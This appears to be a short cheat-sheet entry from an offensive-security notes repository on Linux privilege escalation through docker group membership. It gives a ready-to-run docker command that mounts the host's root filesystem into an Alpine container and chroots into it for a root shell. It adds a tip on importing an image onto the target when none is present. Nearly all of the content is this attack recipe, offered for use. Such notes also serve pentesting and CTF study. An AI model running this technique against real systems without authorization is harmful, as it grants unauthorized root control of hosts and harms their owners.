H3llKa1ser/B00t2R00t/Privilege Escalation/Linux/Docker Group.md

     docker run -v /:/mnt --rm -it alpine chroot /mnt sh

 ## TIP: If there are no images on the machine, you can import one yourself and use this to achieve root!

+Transfer the image to the target machine, then run

+    docker image import alpine.tar.gz